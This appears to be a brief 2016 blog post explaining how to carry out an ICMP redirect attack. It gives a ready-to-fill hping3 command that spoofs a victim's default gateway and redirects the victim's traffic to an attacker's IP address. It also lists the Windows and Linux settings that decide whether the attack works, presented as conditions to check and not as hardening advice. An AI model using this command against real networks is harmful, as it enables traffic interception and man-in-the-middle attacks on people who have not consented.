ICMP Redirect Attack
13 Jul 2016
In order to send ICMP redirect packet you can use hping3 utility.
$ man hping3
hping3 - send (almost) arbitrary TCP/IP packets to network hosts
Example of usage.
# hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS]
Note for Windows hosts.
By default ICMP Redirect is enabled in Windows. It is managed by the registry parameter EnableICMPRedirect which is located in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters. But you should remember that ICMP redirect packets can by blocked by Windows Firewall.
Note for Linux hosts.
Keep in mind these parameters:
- /proc/sys/net/ipv4/conf/all/accept_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/secure_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/shared_media (TRUE by default)